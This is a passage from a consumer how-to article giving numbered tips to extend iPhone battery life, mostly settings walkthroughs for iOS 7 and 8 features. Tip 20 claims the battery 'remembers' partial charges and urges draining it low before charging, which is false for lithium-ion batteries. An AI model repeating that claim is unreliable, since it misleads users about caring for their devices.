You can also access the Bluetooth setting through Control Center. To do that, swipe up from the bottom of the screen and tap the Bluetooth icon (the center one) so that it is grayed out.

6. Turn Off LTE or Cellular Data

The nearly perpetual connectivity offered by the iPhone means connecting to 3G and speedy 4G LTE cellular phone networks. Not surprisingly, using 3G, and especially 4G LTE, requires more energy to get the quicker data speeds and higher-quality calls. It’s tough to go slower, but if you need more power, turn off LTE and just use the older, slower networks. Your battery will last longer (though you’ll need it when you’re downloading websites more slowly!). Alternatively, turn off all cellular data and either just use Wi-Fi or no connectivity at all.

To do this:

  1. Tap Settings
  2. Cellular
  3. Slide Enable LTE to Off/white to use slower cellular data networks while still allowing yourself to use cellular data
  4. To limit yourself just to Wi-Fi, slide Cellular Data to Off/white

7. Keep Wi-Fi Off

The other kind of high-speed network that the iPhone can connect to is Wi-Fi. Wi-Fi is even faster than 3G or 4G, though it’s only available where there’s a hotspot (not virtually everywhere like 3G or 4G). Keeping Wi-Fi turned on at all times in hopes that an open hotspot will appear is a sure way to drain your battery life. So, unless you’re using it right this second, keep Wi-Fi turned off by tapping:

  1. The Settings app
  2. Wi-Fi
  3. Slide to Off/white

You can also turn off Wi-Fi via Control Center. To access that setting, swipe up from the bottom of the screen and tap the Wi-Fi icon to gray it out.

8. Turn Off Location Services

One of the coolest features of the iPhone is its built-in GPS. This allows your phone to know where you are and give you exact driving directions, give that information to apps that help you find restaurants, and more. But, like any service that sends data over a network, it needs battery power to work. If you’re not using Location Services, and don’t plan to right away, turn them off and save some power.

Turn off Location Services by tapping:

  1. The Settings app
  2. Privacy
  3. Location Services
  4. Slide to Off/white

9. Turn Off Other Location Settings

The iPhone can perform a lot of useful tasks in the background, but the more background activity there is, especially activity that connects to the Internet or uses GPS, the faster your battery drains. Some of these features in particular are not required by most iPhone users and can be safely turned off to regain some battery life.

Find them in:

  1. The Settings app
  2. Privacy
  3. Location Services
  4. System Services
  5. Turn off Diagnostics & Usage, Location-Based iAds, Popular Near Me, and Setting Time Zone.

10. Prevent Background App Refresh (iOS 7)

There are a number of new features in iOS 7 designed to make your iPhone smarter and ready for you whenever you need it. One of these features is Background App Refresh. This feature looks at the apps you use most often, the time of day that you use them, and then automatically updates them for you so that the next time you open the app, the latest information is waiting for you. For instance, if you always check social media at 7:30 am, iOS 7 learns that and automatically updates your social apps before 7:30 am. Needless to say, this useful feature drains battery.

To turn it off, tap:

  1. The Settings app
  2. General
  3. Background App Refresh
  4. Either disable the feature entirely or just for specific apps that you don’t want to use it with

11. Don’t Automatically Update Apps (iOS 7)

If you’ve got iOS 7, you can forget needing to update your apps by hand. There’s now a feature that automatically updates them for you when new versions are released. Convenient, but also a drain on your battery. To only update apps when you want to, and thus manage your power better:

  1. Tap the Settings app
  2. iTunes & App Store
  3. In the Automatic Downloads section, find Updates
  4. Move slider to Off/white

12. Turn Data Push Off

The iPhone can be set to automatically pull email and other data down to it or, for some kinds of accounts, have data pushed out to it whenever new data becomes available. You’ve probably realized by now that accessing wireless networks costs you energy, so turning data push off, and thus reducing the number of times your phone connects to the network, will extend your battery’s life. With push off, you’ll need to set your email to check periodically or do it manually (see the next tip for more on this).

Find it in:

  1. The Settings app
  2. Mail, Contacts, Calendar
  3. Fetch New Data
  4. Push
  5. Slide to Off/white

13. Fetch Email Less Often

The less often your phone accesses a network, the less battery it uses. Save battery life by setting your phone to check your email accounts less often. Try checking every hour or, if you’re really serious about saving battery, manually. Manual checking means you’ll never have email waiting for you on your phone, but you’ll also stave off the red battery icon.

Change your Fetch settings by tapping:

  1. The Settings app
  2. Mail, Contacts, Calendar
  3. Fetch
  4. Select your preference (the longer between checks, the better for your battery)

14. Auto-Lock Sooner

You can set your iPhone to automatically go to sleep – a feature known as Auto-Lock – after a certain amount of time. The sooner it sleeps, the less power is used to run the screen or other services. Try setting Auto-Lock to 1 or 2 minutes.

Change the setting in:

  1. The Settings app
  2. General
  3. Auto-Lock
  4. Tap your preference (the shorter, the better)

15. Turn off Equalizer

The iPod app on the iPhone has an Equalizer feature that can adjust music to increase bass, decrease treble, etc. Because these adjustments are made on the fly, they require extra battery. Turn the equalizer off to conserve battery. This means you’ll have a slightly modified listening experience – the power savings might not be worth it to true audiophiles – but for those hoarding battery power, it’s a good deal.

Find it in:

  1. The Settings app
  2. Music
  3. EQ
  4. Tap off

16. Make Sure Personal Hotspot Is Off

This only applies if you use the iPhone’s Personal Hotspot feature to share your wireless data connection with other devices. But if you do that, this tip is key.

Personal Hotspot turns your iPhone into a wireless hotspot that broadcasts its cellular data to other devices within range. This is a tremendously useful feature, but as you may have guessed if you’ve read this far, it also really drains your battery. That’s an acceptable trade when you’re using it, but if you forget to turn it off when you’re done, you’ll be surprised at how quickly your battery drains.

To make sure you turn off Personal Hotspot when you’re done using it:

  1. Tap the Settings app
  2. Personal Hotspot
  3. Move slider to off/white

17. Find the Battery Killers (iOS 8)

Most of the suggestions on this list are about turning things off or not doing certain things. This one helps you discover which apps are killing your battery. In iOS 8, there’s a new feature called Battery Usage that shows which apps have been sucking the most power over the last 24 hours and the last 7 days. If you start seeing an app showing up there consistently, you’ll know that running the app is costing you battery life.

Access Battery Usage by tapping:

  1. The Settings app
  2. General
  3. Usage
  4. Battery Usage

On that screen, you’ll sometimes see notes beneath each item (for instance, in the screenshot, notice “Low Signal” under Personal Hotspot). This note provides more detail on why the app drained so much battery and can suggest ways for you to fix it.

18. Don’t Take App Suggestions (iOS 8)

Suggested Apps is another new feature of iOS 8 that uses your location information to figure out where you are, what you’re near, and what apps—both installed on your phone and available in the App Store—might come in handy based on that information. It can be neat, but needless to say, it uses extra battery life by checking for your location, communicating with the App Store, etc.

To turn off suggested apps:

  1. Tap the Settings app
  2. Tap General
  3. Tap Handoff & Suggested Apps
  4. Move the My Apps and App Store sliders to Off

19. One Common Mistake: Quitting Apps Doesn’t Save Battery

When you talk about tips for saving battery life on your iPhone, perhaps the most common one that comes up is quitting your apps when you’re done with them, rather than letting them run in the background.

This is wrong. In fact, regularly quitting your apps in that way can actually make your battery drain faster. So, if saving battery life is important to you, don’t follow this bad tip.

For more about why this can do the opposite of what you want, read this.

20. Run Down Your Battery As Much As Possible

Believe it or not, but the more often you charge a battery, the less energy it can hold. Counter-intuitive, I know, but it’s one of the quirks of modern batteries.

Over time, the battery remembers the point in its drain at which you recharge it and starts to treat that as its limit. For example, if you always charge your iPhone when it’s still got 75% of its battery left, eventually the battery will start to behave as if its total capacity is 75%, not the original 100%.

The way to get around your battery losing capacity in this way is to use your phone as long as possible before charging it. Try waiting until your phone is down to 20% (or even less!) battery before charging. Just make sure not to wait too long.

mophie Juice Pack Plus (image copyright mophie)

21. Buy an Extended Life Battery

If all else fails, just get more battery. A few accessory makers like mophie and Kensington offer extended life batteries for the iPhone. If you need so much battery life that none of these tips help you enough, an extended life battery is your best bet. With one, you’ll get days more standby time and many hours more use.

22. Do Less-Battery-Intensive Things

Not all ways to save battery life involve settings. Some of them involve the way you use the phone. Things that require the phone be on for long periods of time, or use a lot of system resources, suck the most battery. These things include movies, games, and browsing the web. If you need to conserve battery, limit your use of battery-intensive apps.

Source: http://ipod.about.com/od/iphone3g/tp/iphone-battery-life.01.htm